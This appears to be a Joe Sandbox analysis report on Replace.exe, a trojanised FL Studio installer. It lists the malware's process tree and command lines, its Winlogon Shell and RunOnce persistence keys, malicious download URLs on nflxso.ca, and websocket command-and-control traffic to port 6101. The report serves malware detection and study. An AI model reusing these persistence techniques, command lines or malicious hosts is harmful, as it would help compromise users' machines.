Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Replace.exe

Overview

General Information

Sample name:Replace.exe
Analysis ID:1434556
MD5:fd5cd14325c51ecab6a57d1d665f8852
SHA1:ea16aa0f197210437733c63a42a8f1dd6442d753
SHA256:d433cd0ba6b6850a9f616b3b89754a005699547d4e04fadb75cade770156cfd1
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses known network protocols on non-standard ports
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Replace.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Replace.exe" MD5: FD5CD14325C51ECAB6A57D1D665F8852)
    • rundll32.exe (PID: 7608 cmdline: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsA071.tmp (PID: 8912 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 8952 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 8964 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 9008 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 9152 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 1720 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 8600 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7252 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 5668 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 8732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 2312 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6188 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6548 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6828 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6540 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • run.exe (PID: 7680 cmdline: .\run.exe MD5: D77C3EF3EFA7E38EF91137466EEE801B)
  • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 8332 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8344 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsCCC1.tmp (PID: 4040 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 5924 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P MD5: E9DED10DFF258F6522FE9079ED3319CA)
        • cleaner.exe (PID: 8312 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 8296 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 2836 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
  • rundll32.exe (PID: 8648 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 8660 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt MD5: 889B99C52A60DD49227C5E485A016679)
      • wnsF0F3.tmp (PID: 7708 cmdline: wscsu.exe /S /VERPOSTFIX=bt MD5: 7A506A2E92BC66A9F64C2333A815E97A)
        • cleaner.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P MD5: E9DED10DFF258F6522FE9079ED3319CA)
        • cleaner.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
          • node.exe (PID: 3912 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
            • WMIC.exe (PID: 8480 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: E2DE6500DE1148C7F6027AD50AC8B891)
              • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleaner.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" MD5: E9DED10DFF258F6522FE9079ED3319CA)
    • node.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js" MD5: 5F40521D2E1082FE1C734610C4A83911)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: New RUN Key Pointing to Suspicious Folder
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cleaninethelper
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cleaninethelper
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\wnsA071.tmp, ProcessId: 8912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://files.nflxso.ca/downloads/winapp/latest-version.txt1%Avira URL Cloud: Label: malware
Source: https://files.nflxso.ca/downloads/winapp/latest-installer.exe3Avira URL Cloud: Label: malware
Source: https://files.nflxso.ca/downloads/winapp/latest-installer.exe-Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpAvira: detection malicious, Label: PUA/Agent.clw
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpAvira: detection malicious, Label: PUA/Agent.clw
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmpAvira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpAvira: detection malicious, Label: PUA/Agent.clw
Multi AV Scanner detection for domain / URL
Source: files.nflxso.caVirustotal: Detection: 6%Perma Link
Source: https://files.nflxso.ca/dVirustotal: Detection: 5%Perma Link
Source: http://files.nflxso.ca/downloads/winapp/latest-version.txtVirustotal: Detection: 5%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeVirustotal: Detection: 73%Perma Link
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeVirustotal: Detection: 7%Perma Link
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpVirustotal: Detection: 77%Perma Link
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpVirustotal: Detection: 77%Perma Link
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpVirustotal: Detection: 77%Perma Link
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmpReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\wsc86FC.tmpVirustotal: Detection: 66%Perma Link
Multi AV Scanner detection for submitted file
Source: Replace.exeReversingLabs: Detection: 28%
Source: Replace.exeVirustotal: Detection: 49%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeJoe Sandbox ML: detected
Source: Replace.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-LineJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\__tmp_rar_sfx_access_check_5937078Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\FL64.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDirectory created: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: Replace.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Tue Mar 15 17:28:15 2022 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"not available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Replace.exe, 00000000.00000003.1668526597.0000000004074000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000000.1694241390.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1696934689.0000019819FC2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp, run.exe, 00000002.00000003.1701249383.00000198188A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB2EFC FindFirstFileA,FindFirstFileW,0_2_00BB2EFC
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB9B8F8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00007FF75FB9B8F8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC0870 FindFirstFileExA,2_2_00007FF75FBC0870
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB0310 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,2_2_00007FF75FBB0310
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_0040672B FindFirstFileW,FindClose,13_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00402868 FindFirstFileW,13_2_00402868
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00402868 FindFirstFileW,20_2_00402868
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelperJump to behavior

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.67.152.151 443
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 6101
Source: unknownNetwork traffic detected: HTTP traffic on port 6101 -> 49757
Source: global trafficTCP traffic: 192.168.2.4:49757 -> 74.201.73.52:6101
Source: global trafficHTTP traffic detected: GET /strvn HTTP/1.1Sec-WebSocket-Version: 13Sec-WebSocket-Key: R0PH52ZGGW4pHocLPSKo4A==Connection: UpgradeUpgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: register.nflxso.ca:6101
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 74.201.73.52 74.201.73.52
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-installer.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999Host: files.nflxso.ca
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
